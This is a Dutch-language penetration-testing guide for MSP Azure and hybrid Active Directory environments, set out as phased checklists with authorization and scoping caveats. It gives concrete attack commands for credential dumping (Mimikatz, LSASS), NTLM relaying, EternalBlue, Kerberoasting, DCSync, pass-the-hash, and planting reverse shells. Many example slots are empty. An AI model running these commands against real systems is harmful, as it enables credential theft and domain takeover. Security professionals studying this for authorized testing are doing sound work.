Pentest Versie 5+
Lage-Impact Azure Control Plane Beoordeling: Gebruikt voornamelijk Azure PowerShell/MS Graph API's, focust op configuratiebeoordeling, permissieanalyse en het identificeren van potentiële kwetsbaarheden zonder actieve exploitatie. Minimale voetafdruk, laag detectierisico.
Hoge-Impact Interne & Hybride Penetratietest: Omvat actief netwerk scannen, exploitatie van kwetsbaarheden, credential dumping, netwerk relay-aanvallen, persistentietechnieken gericht op interne AD en hosts, en pivoteren tussen Azure en interne omgevingen. Draagt AANZIENLIJK OPERATIONEEL RISICO, HOGE DETECTIEKANS, en vereist EXPLICIETE, GRANULAIRE AUTORISATIE in de RoE voor ELKE high-impact techniek.
Deze gids presenteert beide. De beslissing welke technieken te gebruiken hangt volledig af van de geautoriseerde scope, rules of engagement (RoE), risicotolerantie en het oordeel van de tester. Ga ervan uit dat high-impact acties GEDETECTEERD ZULLEN WORDEN.
Fase 0: Voorbereiding - Autorisatie, Scoping & Arsenal Setup
Doel: Creëer waterdichte juridische autorisatie, definieer een precieze scope die Azure tenants, subscriptions, gedelegeerde toegang, EN potentieel interne netwerken/IP-reeksen omvat. Breng het complexe MSP-Klant technische ecosysteem in kaart (inclusief hybride koppelingen). Bereid de Azure PowerShell-omgeving EN traditionele interne pentesting tools voor.
Stap 0.1: Autorisatie & Hyper-Scoping
[ ]Uitleg: Verkrijg ondertekende autorisaties van meerdere partijen (MSP en alle in-scope klanten). Definieer de precieze grenzen. Voor MSP's is dit complex vanwege multi-tenancy en gedeelde verantwoordelijkheid. Een gebrek aan duidelijke autorisatie is een juridisch mijnenveld.[ ]Checklist & Voorbeelden:[ ]Gesigneerde SoW/RoE van MSP.Voorbeeld: Een PDF-document getiteld "Statement_of_Work_MSP_Azure_Pentest_Q3_2024.pdf" ondertekend door de CTO van de MSP.
[ ]Gesigneerde SoW/RoE addenda/bevestigingen van elke in-scope klant tenant eigenaar.Voorbeeld: Aparte e-mailbevestigingen of ondertekende addenda van Klant A ("ClientA_Pentest_Authorization.pdf") en Klant B ("ClientB_Pentest_Consent.eml").
[ ]RoE vermeldt toegestane Tenant ID's, Subscription ID's, Lighthouse/GDAP Relatie ID's.Voorbeeld: RoE Sectie 3.1: "Scope omvat MSP Tenant ID:
abc...def, Klant A Tenant ID:123...456, Klant A Subscription ID:sub-A-prod-..., Klant B Tenant ID:789...abc, GDAP Relatie:MSP_ClientB_Support_Rel."
[ ]RoE specificeert toegestane Azure PowerShell cmdlets (vooral niet-Get-*).Voorbeeld: RoE Appendix B: "Cmdlets beperkt tot
Get-*,Resolve-*,Test-*. Expliciete goedkeuring vereist voorNew-AzRoleAssignment,Set-AzKeyVaultSecret,Invoke-AzVMRunCommand."
[ ][KRITIEKE SCOPE] RoE beschrijft expliciet toegestane interne scope: IP-reeksen, specifieke uitgesloten systemen.Voorbeeld: RoE Sectie 3.2: "Interne scope beperkt tot
192.168.10.0/24(Kantoor Klant A) en10.50.0.0/16(MSP Management VLAN). Uitgesloten:192.168.10.250(Gebouwbeheersysteem)."
[ ][KRITIEKE SCOPE] RoE keurt expliciet elke categorie van HIGH-IMPACT technieken goed.Voorbeeld: RoE Appendix C: "Goedgekeurde High-Impact Technieken: Actief Netwerk Scannen (
nmap -sV) op gescoopte reeksen; Netwerk Relay Aanvallen (Responder/ntlmrelayx) alleen op10.50.0.0/16; Credential Dumping (Mimikatzlsadump::sam,sekurlsa::logonpasswords) geautoriseerd alleen op door tester ingezette VM's; Geen actieve exploitatie van kwetsbaarheden toegestaan."
[ ]RoE definieert communicatiekanalen, escalatiepunten, testvensters en incidentafhandelingsprocedures.Voorbeeld: RoE Sectie 5: "Primair Contact:
[email protected]. Escalatie: Jane Doe (MSP Security Lead). Testvenster: Ma-Vr 22:00 - 06:00 Lokale Tijd. Incident gedetecteerd? Stop activiteit, neem onmiddellijk contact op met Primair Contact."
Azure PowerShell Voorbeeld (Conceptueel - Geen directe code voor autorisatie): N.v.t. - Juridische/Contractuele stap.
Stap 0.2: MSP Ecosysteem Diepgaande Analyse (Hybride Focus)
[ ]Uitleg: Begrijp hoe de MSP klanten beheert (Lighthouse, GDAP, custom scripts?), de Azure AD structuur, en cruciaal, hoe Azure integreert met interne netwerken (AAD Connect, VPN/ER, Arc, Hybrid Workers). Deze context is vitaal voor het identificeren van pivot-punten.[ ]Checklist & Voorbeelden:[ ]Beoordeel MSP's Azure Tenant: Lighthouse Definities, RBAC-rollen, PIM-beleid.Voorbeeld: Uitvoeren van
Get-AzManagedServicesDefinitionin MSP tenant toont een aanbod genaamd "Gold_Client_Support" dat de "Contributor" rol en een custom "BackupOperator" rol delegeert. PIM-beleid vereist MFA voor activering van de "MSP Global Admins" rol.
[ ]Begrijp GDAP rol-mapping naar AAD-groepen binnen MSP tenant.Voorbeeld: Interviewnotities geven aan dat GDAP-rol "Helpdesk Agent" voor Klant B is toegewezen aan de AAD-groep "MSP_Tier1_Support_ClientB" in de MSP tenant.
[ ]Documenteer bekende hybride connecties: AAD Connect server locatie/topologie, ADFS details, VPN/ER gateway IPs/subnets, Arc-enabled server doeleinden, Hybrid Worker locaties.Voorbeeld: Een diagram toont
AADConnect01.internal.corp(IP:10.50.1.10) die synchroniseert naar Azure. VPN Gateway Public IP is20.x.y.z, verbindt met interne reeks10.50.0.0/16. Drie Arc-servers getagged "Patching Target" bestaan in Klant A's sub.
[ ]Documenteer interne AD-structuur basics (domeinen, trusts) indien informatie beschikbaar is.Voorbeeld: MSP gebruikt
internal.corpdomein. Klant A gebruiktclientA.local. Geen trust gedocumenteerd tussen hen.
Azure PowerShell Voorbeeld (MSP Tenant Context - Read Only):
Stap 0.3: PowerShell & Pentest Arsenaal Voorbereiding
[ ]Uitleg: Zorg ervoor dat uw testmachine beschikt over de benodigde Azure PowerShell-modules EN een volledige suite van interne netwerk pentesting tools (typisch via een dedicated VM zoals Kali Linux).[ ]Checklist & Voorbeelden (Azure Tools):[ ]Verifieer/UpdateAzModule.Voorbeeld:
Get-Module Az -ListAvailabletoont versie 9.x.x geïnstalleerd. Indien ouder, voerUpdate-Module Az -Forceuit.
[ ]Verifieer/InstalleerMicrosoft.GraphSDK Modules.Voorbeeld: Het uitvoeren van het checkscript uit Fase 0 bevestigt dat
Microsoft.Graph.Authentication,Identity.DirectoryManagement, etc., aanwezig zijn. Zo niet, voerInstall-Module Microsoft.Graph.Identity.DirectoryManagement -Scope CurrentUser -Forceuit.
[ ]Controleer PowerShellExecutionPolicy.Voorbeeld:
Get-ExecutionPolicy -Scope CurrentUserretourneertRemoteSigned. IndienRestricted, voerSet-ExecutionPolicy RemoteSigned -Scope CurrentUser -Forceuit.
[ ]OptioneleGet-AzTenantconnectiviteitscheck.Voorbeeld:
Get-AzTenant -DomainName mspcompany.comretourneert succesvol de Tenant ID, wat basisconnectiviteit en DNS-resolutie voor Azure endpoints bevestigt.
[ ]Optioneel laden van helper scripts/profielen.Voorbeeld:
. .\MyCommonFunctions.ps1laadt custom functies zoalsExport-CsvLogvan een lokaal hulpprogrammascript.
[ ]Checklist & Voorbeelden (Interne Tools - Aangenomen op aparte Kali/Pentest VM):[ ]NmapVoorbeeld:
nmap --versiontoont Nmap 7.9x geïnstalleerd.
[ ]Enum4linux-ng, Impacket SuiteVoorbeeld:
enum4linux-ng -henpsexec.py -htonen helpmenu's, wat installatie bevestigt.
[ ]Metasploit FrameworkVoorbeeld:
msfconsole -vtoont Metasploit Framework 6.x beschikbaar.
[ ]Responder, ntlmrelayx.pyVoorbeeld:
sudo responder -henntlmrelayx.py -htonen gebruiksopties.
[ ]Hydra, CrackMapExec, Hashcat/JohnVoorbeeld:
hydra -h,crackmapexec --help,hashcat -hbevestigen dat tools in PATH staan.
[ ]Mimikatz, ProcdumpVoorbeeld:
mimikatz.exe(op een Windows VM/implant) start;procdump.exegebruik is bekend.
[ ]BloodHound/SharpHound, WinPEAS/LinPEASVoorbeeld: BloodHound GUI geïnstalleerd;
SharpHound.ps1ofSharpHound.exebeschikbaar;WinPEAS.bat/linpeas.shgedownload.
[ ]Chisel, ligolo-ng, SSHVoorbeeld:
chisel -h,ligolo-ng -h,ssh -Vtonen dat tools klaar zijn voor pivoting/tunneling.
Azure PowerShell Voorbeeld (Omgevingssetup):
Fase 1: Uitgebreide Reconnaissance (Azure, Intern, OSINT)
Doel: Ontdek de publieke voetafdruk van de MSP en mogelijk klanten (domeinen, IP's, cloud services), identificeer Tenant ID's, breng het externe aanvalsoppervlak in kaart, en voer initiële geautoriseerde interne netwerk discovery uit indien binnen scope. Combineer OSINT, low-impact Azure probes, en potentieel higher-impact interne scans.
Stap 1.1: [LAGE-IMPACT AZURE/OSINT] Externe Footprinting
[ ]Uitleg: Identificeer domeinen, subdomeinen, geassocieerde Tenant ID's, en publiek blootgestelde Azure-services met behulp van niet-intrusieve methoden.[ ]Checklist & Voorbeelden:[ ]Gebruik OSINT tools/websites voor domeinen, IP's, tech stack.Voorbeeld: Zoeken op
dnsdumpster.comnaarmspcompany.comonthult subdomeinen zoalsportal.mspcompany.comenvpn.mspcompany.comdie naar specifieke IP-adressen wijzen. Shodan zoekopdracht voor IP's toont IIS draaiend.
[ ]Resolveer bekende MSP/klant domeinen naar Tenant ID's.Voorbeeld:
retourneert Tenant ID
123...456.
[ ]Analyseer OIDC endpoints voor Tenant details.Voorbeeld:
toont de
issuerURL die de tenant ID123...456bevestigt.
[ ]Voer uitgebreide DNS enumeratie uit (A, CNAME, TXT).Voorbeeld:
[ ]Raad en probeer publieke Azure Storage accounts.Voorbeeld:
Azure PowerShell Voorbeeld: (Zie Voorbeelden hierboven binnen Checklist).
Stap 1.2: [LAGE-IMPACT AZURE/OSINT] Initieel Service Onderzoek (Optioneel - RoE Afhankelijk)
[ ]Uitleg: Controleer voorzichtig of veelvoorkomende poorten open zijn op ontdekte publieke IP's. Controleer RoE nauwgezet alvorens in te schakelen.[ ]Checklist & Voorbeelden:[ ][RoE Check] Indien toegestaan, voer voorzichtige TCP poortscans uit op ontdekte publieke IP's.Voorbeeld (Conceptuele PowerShell):
[ ][RoE Check] Indien toegestaan, probeer banner grabbing op open poorten.Voorbeeld: Handmatig verbinden
nc 20.x.y.z 443en garbage sturen kan een SSL-certificaat of webserverbanner onthullen. Vereist RoE.
[ ][RoE Check] Indien specifieke IP's vermoedelijk Azure VM's zijn en RoE directe verbindingspogingen toestaat, probeer Azure Instance Metadata service check.Voorbeeld:
Succes (JSON terugkrijgen) impliceert sterk een Azure VM. Vereist specifieke RoE.
Azure PowerShell Voorbeeld: (Zie PowerShell script voorbeeld in vorige antwoord / Gentle Port Check voorbeeld hierboven).
Stap 1.3: [HOGE-IMPACT INTERN] Initieel Intern Netwerk Recon (Vereist Interne Scope & RoE)
[ ]Uitleg: Indien intern gepivoteerd of startend binnen een geautoriseerd intern netwerksegment, begin met het in kaart brengen van de lokale omgeving. Genereert detecteerbaar netwerkverkeer.[ ]Checklist & Voorbeelden:[ ][RoE Check] Identificeer eigen interne IP, subnetmasker, gateway, DNS-servers.Voorbeeld: Op Kali VM (aangenomen pivot punt):
ip atoont IP10.50.1.100/16, gateway10.50.0.1.cat /etc/resolv.conftoont DNS server10.50.0.5.
[ ][RoE Check] [DETECTIE RISICO] Voer netwerk host discovery uit op toegestane segmenten.Voorbeeld:
sudo nmap -sn 10.50.1.0/24lijst 15 hosts op die reageren op pings/ARP binnen die /24.
[ ][RoE Check] [DETECTIE RISICO] Voer initiële, beperkte poortscans uit op ontdekte live hosts.Voorbeeld:
sudo nmap -T4 --top-ports 1000 10.50.1.10 10.50.1.15toont host.10heeft 88 (Kerberos), 389 (LDAP), 445 (SMB) open. Host.15heeft 80, 443 open.
[ ][RoE Check] Probeer basis anonieme/null-sessie enumeratie.Voorbeeld:
smbclient -N -L \\\\10.50.1.10lijst shares zoalsIPC$,NETLOGON,SYSVOL.ldapsearch -x -h 10.50.1.10 -b "" -s base namingContextsretourneertDC=internal,DC=corp.
Azure PowerShell Voorbeeld (Informatief):
Fase 2: Geauthenticeerde Enumeratie & Kwetsbaarheidsanalyse (Azure & Intern)
Doel: Maak gebruik van geautoriseerde credentials voor diepgaande exploratie van Azure en intern AD/netwerk. Identificeer misconfiguraties, kwetsbaarheden, vertrouwensrelaties en potentiële pivot-punten.
Stap 2.1: [LAGE-IMPACT AZURE] Azure Geauthenticeerde Diepe Enumeratie
[ ]Uitleg: Gebruik verkregen Azure credentials om Azure AD, RBAC, resources en delegatie mechanismen uitgebreid in kaart te brengen over alle toegankelijke scopes.[ ]Checklist & Voorbeelden (Voer relevante secties uit per Tenant/Subscription Context):[ ]Context Validatie: Verifieer connectie, lijst toegankelijke Subscriptions.Voorbeeld:
[ ]Delegatie Mapping: Enumereer Lighthouse, GDAP.Voorbeeld:
[ ]AAD Objecten:[ ]Gebruikers (Get-AzADUser): Controleer types, enabled status, sync status, gasten, admin rollen.Voorbeeld:
[ ]Groepen (Get-AzADGroup): Controleer security/role-assignable status, owners, leden, sync status, groepgebruik in delegaties.Voorbeeld:
[ ]Service Principals (Get-AzADServicePrincipal): Controleer credentials, owners, types, toegekende permissies.Voorbeeld:
[ ]Applicaties (Get-AzADApplication): Controleer multi-tenant status, owners, reply URLs, gevraagde permissies.Voorbeeld:
[ ]Azure RBAC:[ ]Toewijzingen (Get-AzRoleAssignment -IncludeClassicAdministrators): Map rollen, identificeer gasten, noteer geprivilegieerde rollen.Voorbeeld:
[ ]Custom Rollen (Get-AzRoleDefinition -Custom): Analyseer acties voor gevaarlijke permissies.Voorbeeld:
[ ]Klassieke Admins (Get-AzClassicAdministrator).Voorbeeld:
[ ]Azure Resources (Per Subscription): Enumereer uitgebreid, noteer hybride componenten.Voorbeeld:
[ ]Resource Graph Queries: GebruikSearch-AzGraphvoor brede configuratiechecks.Voorbeeld:
Azure PowerShell Voorbeeld: (Zie Checklist Voorbeelden hierboven & Fase 2 Script Voorbeelden in vorige antwoord).
Stap 2.2: [HOGE-IMPACT INTERN] Interne Diepe Enumeratie & Kwetsbaarheidsscanning (Vereist Interne Scope/Creds & RoE)
[ ]Uitleg: Indien interne toegang/credentials verkregen zijn, voer diepe enumeratie van Active Directory en netwerkservices uit. Identificeer misconfiguraties en kwetsbaarheden met actieve scanning en gespecialiseerde tools. Deze acties zijn luidruchtig en vereisen specifieke autorisatie.[ ]Checklist & Voorbeelden:[ ][RoE Check] [DETECTIE RISICO] Gedetailleerde Service Scanning.Voorbeeld:
sudo nmap -sV -sC -p 135,139,445,3389 10.50.1.10toont SMBv1 enabled (potentiële kwetsbaarheid) en identificeert exacte Windows Server versie.-p-voor alle poorten is veel langzamer/luidruchtiger.
[ ][RoE Check] [DETECTIE RISICO] Diepe AD Enumeratie:[ ]BloodHound/SharpHound dataverzameling & Analyse.Voorbeeld: Uitvoeren
SharpHound.exe -c Allop een joined machine genereert ZIP-bestanden. Importeren in BloodHound GUI onthult gebruikerj.doeis lid van groepLocalAdmins_Tier0die GenericAll rechten heeft op het Domein object -> pad naar DA.
[ ]Gebruik PowerView/SharpView of Impacket voor details.Voorbeeld: Van joined machine (of via
psexec):powershell -exec bypass -c "Import-Module .\PowerView.ps1; Get-NetUser -AdminCount | Select SamAccountName"lijst geprivilegieerde gebruikers op. Impacket:lookupsid.py internal.corp/[email protected]resolveert de SID.
[ ]Identificeer Kerberoastable gebruikers.Voorbeeld:
GetUserSPNs.py internal.corp/pentester:Password123! -dc-ip 10.50.1.10 -requestretourneert TGS hashes voor service accounts zoalssvc_sql.
[ ]Identificeer AS-REP Roastable gebruikers.Voorbeeld:
GetNPUsers.py internal.corp/ -dc-ip 10.50.1.10 -request -format hashcat -outputfile asrep_hashes.txtvindt gebruikers met "Do not require Kerberos preauthentication" ingesteld en slaat hun TGT hashes op.
[ ]Controleer SYSVOL op GPP wachtwoorden of gevoelige bestanden.Voorbeeld: Browsen
\\\\internal.corp\SYSVOL\internal.corp\Policies\{GUID}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xmlonthult credentials opgeslagen voor een geplande taak. Gebruikgpp-decryptop de cpassword.
[ ][RoE Check] Netwerk Share Diepgaande Analyse: Authenticeer op shares (indien creds bekend), lijst recursief bestanden op, controleer permissies, grep naar gevoelige info (wachtwoorden, sleutels, connectiestrings).Voorbeeld:
crackmapexec smb 10.50.1.0/24 -u '' -p '' --sharestoont READ toegang tot\\10.50.1.50\IT_Scripts. Browsen onthultdeploy_azure.ps1dat hardcoded SP credentials bevat.
[ ][RoE Check] Enumereer andere interne services geïdentificeerd (databases - check default creds, interne web apps - dirbusting/vuln scan).Voorbeeld: Verbind met MSSQL service gevonden op
10.50.1.20met defaultsa/Password123(indien toegestaan door RoE) -> succes. Voernmap --script http-enum <internal_web_ip>uit en ontdekt/backup/directory.
Azure PowerShell Voorbeeld (Informatief):
Stap 2.3: [HYBRIDE PIVOT] Kwetsbaarheidsanalyse & Correlatie
[ ]Uitleg: Synthetiseer bevindingen van zowel Azure als interne enumeratie om cross-environment zwakheden te identificeren.[ ]Checklist & Voorbeelden:[ ]Breng Azure misconfiguraties in kaart.Voorbeeld: Owner rol toegewezen aan
MSP_Backup_AppSP geïdentificeerd. Storage accountmsplogsstaat publieke blob toegang toe.
[ ]Breng interne misconfiguraties in kaart.Voorbeeld: Gebruiker
svc_sqlis Kerberoastable gevonden. SMB Signing uitgeschakeld op serverAPP01. GPO verspreidt lokaal admin wachtwoord via GPP.
[ ]Correlatie:Voorbeeld: Azure VM
ClientA-Web01is Arc-enabled. GebruikerclientA\backup_svcheeft Azure Contributor RBAC op deze Arc resource. IndienclientA\backup_svcintern gecompromitteerd wordt, kanInvoke-AzVMRunCommandgebruikt worden om als SYSTEM uit te voeren opClientA-Web01.Voorbeeld: Gebruiker
[email protected]synchroniseert naar Azure AD ([email protected]) en is Global Admin. Compromitteren van[email protected]intern geeft GA toegang.Voorbeeld: Interne share
\\filesrv\Public\AzureCreds.xlsxbevat plaintext Azure Storage keys.
[ ]Identificeer bekende CVE's.Voorbeeld: Interne server
WEBSERVER01(IP10.50.1.15) heeft Apache2.4.49volgens Nmap-sV.searchsploit apache 2.4.49onthult CVE-2021-41773 (Path Traversal).
Azure PowerShell Voorbeeld (Controleer NSG Regels voor Specifieke Interne Reeks):
Fase 3: Foothold & Initiele Toegang (Uitbuiten van Zwakheden)
Doel: Verkrijg de eerste shell of ongeautoriseerde toegangssessie binnen de Azure-omgeving of het interne netwerk. Deze fase omvat actieve exploitatie en draagt significant risico.
Stap 3.1: [LAGE-IMPACT AZURE] / [HOGE-IMPACT AZURE] Azure Initiele Toegangspogingen
[ ]Uitleg: Probeer toegang te krijgen tot Azure met credentials, misconfiguraties, of applicatie kwetsbaarheden. Impact varieert.[ ]Checklist & Voorbeelden:[ ][DETECTIE RISICO] Password Spray tegen AAD.Voorbeeld: Met MSOLSpray tool:
MSOLSpray -UserList users.txt -Password 'Summer2024!' -MaxThreads 5. Monitor op geblokkeerde accounts.
[ ]Gebruik gelekte/gevonden credentials.Voorbeeld: Met credentials
[email protected] / FoundPassword1gevonden in interne recon:Login succesvol.
[ ][RoE Check] [HOGE-IMPACT] Exploit kwetsbaarheden in Azure-hosted web applicaties.Voorbeeld: Met Burp Suite tegen
app.clientA.comgehost op Azure App Service, vind SQL injectie kwetsbaarheid in zoekparameter. Gebruiksqlmapom database content te dumpen (vereist web pentest skills & tools).
[ ]Maak misbruik van excessieve Gast permissies.Voorbeeld: Inloggen als gecompromitteerde Gast gebruiker
[email protected]toont dat ze onverwachte toegang hebben om gebruikers/groepen te enumereren via Azure portal/PowerShell (Get-AzADUser).
Azure PowerShell Voorbeeld (Loginpoging met Credentials):
Stap 3.2: [HOGE-IMPACT INTERN] Interne Initiele Toegangspogingen (Vereist Interne Scope & Expliciete RoE)
[ ]Uitleg: Exploit kwetsbaarheden of misconfiguraties binnen het interne netwerk om een foothold te verkrijgen. Hoge-impact en vereist specifieke autorisatie.[ ]Checklist & Voorbeelden:[ ][RoE Check] [HOGE-IMPACT] [DETECTIE RISICO] Netwerk Poisoning & Relaying.Voorbeeld: Draai
sudo responder -I eth0 -wrf. Een gebruiker benadert\\nonexistent. Responder vangt Net-NTLMv2 hash. Draaisudo ntlmrelayx.py -t smb://10.50.1.50 -c "whoami". Indien SMB signing uitgeschakeld is op.50, voert commando succesvol uit.
[ ][RoE Check] [HOGE-IMPACT] [DETECTIE RISICO] Exploit Bekende Kwetsbaarheden.Voorbeeld: Target server
10.50.1.40geïdentificeerd als kwetsbaar voor MS17-010. Inmsfconsole:use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 10.50.1.40; run. Meterpreter sessie verkregen.
[ ][RoE Check] [HOGE-IMPACT] Kerberoasting / AS-REP Roasting.Voorbeeld: Kraak Kerberoast hash voor
svc_sqlmethashcat -m 13100 hash.txt rockyou.txt. Gekraakt wachtwoord isSqlServicePa$$. Gebruikcrackmapexec winrm 10.50.1.20 -u svc_sql -p 'SqlServicePa$$' -x whoami-> succesvolle uitvoering.
[ ][RoE Check] [HOGE-IMPACT] [DETECTIE RISICO] Interne Password Spraying.Voorbeeld:
crackmapexec smb 10.50.1.0/24 -u usernames.txt -p 'Winter2023!' --continue-on-successvindt geldige credentials voorj.doe.
[ ][RoE Check] Gebruik GPP Wachtwoorden gevonden in SYSVOL.Voorbeeld: Decrypt GPP wachtwoord gevonden in XML-bestand voor gebruiker
adm_local. Gebruikpsexec.py internal.corp/[email protected]met het gedecrypteerde wachtwoord -> SYSTEM shell.
[ ][RoE Check] Maak misbruik van zwakke share permissies.Voorbeeld: Share
\\10.50.1.50\Installersis world-writable. Uploadnc.exeen een reverse shell batch script. Vind manier om uitvoering te triggeren.
Azure PowerShell Voorbeeld (Conceptueel - Trigger Run Command indien Azure Toegang Verkregen tot Hybride Machine):
Fase 4: Privileges Escalatie (Verticaal & Horizontaal)
Doel: Verhoog permissies vanaf de initiele foothold om hogere controle te krijgen binnen het gecompromitteerde systeem of omgeving (bv. Local Admin, Domain Admin, Azure Subscription Owner, Global Admin).
Stap 4.1: [LAGE-IMPACT AZURE] / [HOGE-IMPACT AZURE] Azure Privileges Escalatie
[ ]Uitleg: Gebruik permissies van het gecompromitteerde Azure principal of exploit Azure misconfiguraties om hogere RBAC of AAD rollen te verkrijgen.[ ]Checklist & Voorbeelden:[ ]Exploit RBAC:[ ]Indien User Access Admin: Voeg zelf toe als Owner.Voorbeeld:
[ ]Indien Contributor op Sub/RG: Exploit code executie permissies.Voorbeeld: Als Contributor, deploy een ARM-template met
New-AzResourceGroupDeploymentdie een Custom Script Extension op een VM uitvoert.
[ ]Indien Contributor op Automation Account: Wijzig Runbook.Voorbeeld: Gebruik
Set-AzAutomationRunbookContentom een Runbook script te vervangen.
[ ]Exploit AAD Permissies:[ ]Indien SP Owner: Voeg nieuw secret toe.Voorbeeld:
[ ]Indien Application Admin/Cloud App Admin: Geef illegale consent of voeg creds toe.Voorbeeld: Gebruik Azure Portal/Graph API om hoge API permissies toe te voegen aan een gecontroleerde applicatie en geef admin consent.
[ ]Indien Privileged Role Admin/Global Admin: Wijs rollen toe aan zelf/anderen.Voorbeeld (MSGraph):
[ ]Exploit Resource Permissies:[ ]Indien Key Vault Secrets Officer/Write policy: Overschrijf secrets.Voorbeeld:
[ ]Indien Storage Account Contributor/listKeys: Haal keys op.Voorbeeld:
Azure PowerShell Voorbeeld (Voeg Zelf Toe als Owner indien User Access Admin):
Stap 4.2: [HOGE-IMPACT INTERN] Interne Privileges Escalatie (Vereist Interne Foothold & Expliciete RoE)
[ ]Uitleg: Verhoog privileges op de gecompromitteerde interne host en potentieel binnen het AD domein. Hoge-impact en waarschijnlijk gedetecteerd.[ ]Checklist & Voorbeelden (Op Gecompromitteerde Interne Host):[ ][RoE Check] [HOGE-IMPACT] Lokale Enumeratie.Voorbeeld: Uitvoeren
WinPEAS.batmarkeert een Unquoted Service Path voor "CrappyAppService". Service binary pad is schrijfbaar door Authenticated Users.
[ ][RoE Check] [HOGE-IMPACT] [DETECTIE RISICO] Lokaal Credential Dumping.Voorbeeld: Op Meterpreter sessie:
load kiwi; creds_all. Mimikatz output toont NTLM hash voor ingelogde domeingebruikerj.smith. Draaiprocdump64.exe -accepteula -ma lsass.exe lsass.dmp, exfiltreerlsass.dmp, draai Mimikatz offline:sekurlsa::minidump lsass.dmp,sekurlsa::logonpasswords.
[ ][RoE Check] [HOGE-IMPACT] Exploit Lokale Kwetsbaarheden.Voorbeeld: Vervang
C:\Program Files (x86)\Crappy App\CrappyAppService.exe(vanwege zwakke perms gevonden dooraccesschk) met reverse shell payload. Herstart service (sc stop CrappyAppService; sc start CrappyAppService) -> SYSTEM shell callback. Check kernel exploits zoals JuicyPotato/RottenPotato.
[ ][RoE Check] [HOGE-IMPACT] [DETECTIE RISICO] Pass-the-Hash/Ticket.Voorbeeld: Gebruik
j.smith's NTLM hash verkregen via Mimikatz:psexec.py -hashes :<NT_HASH> internal.corp/[email protected]om SYSTEM shell te krijgen op DC01 (indien j.smith DA is).
[ ][RoE Check] [HOGE-IMPACT] Domein Privileges Escalatie (Vereist foothold):[ ]Gebruik BloodHound data: Identificeer kortste pad naar DA.Voorbeeld: BloodHound toont huidige gebruiker kan schrijven naar GPO gelinkt aan Domain Controllers OU. Wijzig GPO om startup script uit te voeren dat gebruiker toevoegt aan DA groep. Wacht op GPUpdate of forceer (
Invoke-GPUpdate).
[ ]Misbruik Unconstrained/Constrained Delegation.Voorbeeld: Indien machine met Unconstrained Delegation gecompromitteerd is, forceer authenticatie van DC (bv. Printer Bug), steel DC's TGT uit geheugen met Mimikatz (
sekurlsa::tickets /export), gebruik Pass-the-Ticket.
[ ]Misbruik ADCS (Certificate Templates).Voorbeeld: Gebruik Certipy (
certipy find ... -vulnerable) vindt kwetsbare ESC1 template. Vraag cert aan:certipy req ... -template VulnTemplate. Authenticeer met cert:certipy auth -pfx cert.pfx. Voer DCSync uit.
[ ]Gebruiksecretsdump.pyofdcsyncindien geprivilegieerd account verkregen.Voorbeeld: Na verkrijgen DA hash:
secretsdump.py -hashes :<DA_NT_HASH> internal.corp/[email protected]om alle domein hashes te dumpen inclusief krbtgt.
Azure PowerShell Voorbeeld (Informatief):
Fase 5: Laterale Beweging & Missie Doelstellingen (Grenzen Overschrijden)
Doel: Verspreid toegang door de omgeving(en), beweeg tussen systemen en potentieel tussen Azure en het interne netwerk, om de uiteindelijke doelstellingen gedefinieerd in de RoE te bereiken.
Stap 5.1: [LAGE-IMPACT AZURE] / [HOGE-IMPACT AZURE] Azure Laterale Beweging
[ ]Uitleg: Gebruik verkregen privileges en Azure features om te bewegen tussen subscriptions, resource groups, en potentieel naar client tenants via delegatie.[ ]Checklist & Voorbeelden:[ ]Gebruik gecompromitteerde credentials/sessies: Krijg toegang tot resources toegestaan door RBAC.Voorbeeld:
wisselt context om te opereren in Sub B.
[ ][HYBRIDE PIVOT] Pivot via Lighthouse/GDAP delegaties.Voorbeeld: Gecompromitteerd MSP account zit in groep "MSP_Tier2_Support" die GDAP "Global Reader" toegang heeft tot Klant B. Verbind met MSP creds, gebruik dan Graph cmdlets gericht op Klant B's tenant ID:
[ ]Beweeg tussen VNets via Peering of Gateways.Voorbeeld: Vanaf gecompromitteerde VM in VNet A (gepeerd met VNet B), gebruik
Test-NetConnection <IP_in_VNet_B> -Port 3389. Succes indiceert open netwerkpad (afhankelijk van NSG regels).
[ ]Gebruik gestolen credentials/keys van KV of Storage om toegang te krijgen tot gelinkte resources.Voorbeeld: Gebruik Storage Key gestolen uit Key Vault:
Azure PowerShell Voorbeeld (Wissel Subscription Context):
Stap 5.2: [HOGE-IMPACT INTERN] Interne Netwerk Laterale Beweging (Vereist Interne Foothold & Expliciete RoE)
[ ]Uitleg: Gebruik gecompromitteerde credentials/technieken om te bewegen tussen interne systemen.[ ]Checklist & Voorbeelden:[ ][RoE Check] [HOGE-IMPACT] [DETECTIE RISICO] Pass-the-Hash/Ticket.Voorbeeld: Vanaf Kali, met DA hash:
wmiexec.py -hashes :<DA_NT_HASH> internal.corp/[email protected] "dir c:\sensitive_data".
[ ][RoE Check] RDP/WinRM/SSH met gecompromitteerde credentials.Voorbeeld: Gebruik
xfreerdp /v:CLIENTPC05 /u:j.smith /p:<CrackedPassword>om te RDP'en naar ander werkstation. GebruikEnter-PSSession -ComputerName SERVER02 -Credential $credmet verkregen credentials.
[ ][RoE Check] Maak misbruik van local admin access sprawl.Voorbeeld: Gedumpte hash voor lokale admin
.\ladminop PC1. Probeerpsexec.py -hashes :<ladmin_NT_HASH> internal.corp/ladmin@PC2-> Succes, zelfde lokaal admin wachtwoord gebruikt.
[ ][RoE Check] Her-draai enumeratie scans vanaf nieuw gecompromitteerde hosts.Voorbeeld: Vanaf gecompromitteerde Server A (die route heeft naar ander subnet), draai
nmap -sT 192.168.50.0/24om hosts te vinden in voorheen onscanbaar netwerk.
Azure PowerShell Voorbeeld (Informatief):
Stap 5.3: [HYBRIDE PIVOT] Pivoteren Tussen Azure & Intern
[ ]Uitleg: Gebruik actief verkregen toegang in de ene omgeving om toegang te krijgen of privileges te escaleren in de andere.[ ]Checklist & Voorbeelden:[ ][HYBRIDE PIVOT] Azure -> Intern:[ ]GebruikInvoke-AzVMRunCommandop Arc/Hybrid Workers.Voorbeeld: Verkrijg Contributor op Arc machine
APP01-Arc. GebruikInvoke-AzVMRunCommandom Mimikatz (privilege::debug,sekurlsa::logonpasswords) direct uit te voeren op de interneAPP01server via Arc agent.
[ ]RDP/SSH/WinRM van gecontroleerde Azure VM naar interne netwerk.Voorbeeld: RDP naar Azure VM
JumpBox01die VPN connectie actief heeft. VanafJumpBox01, RDP naar interne DC10.50.1.10.
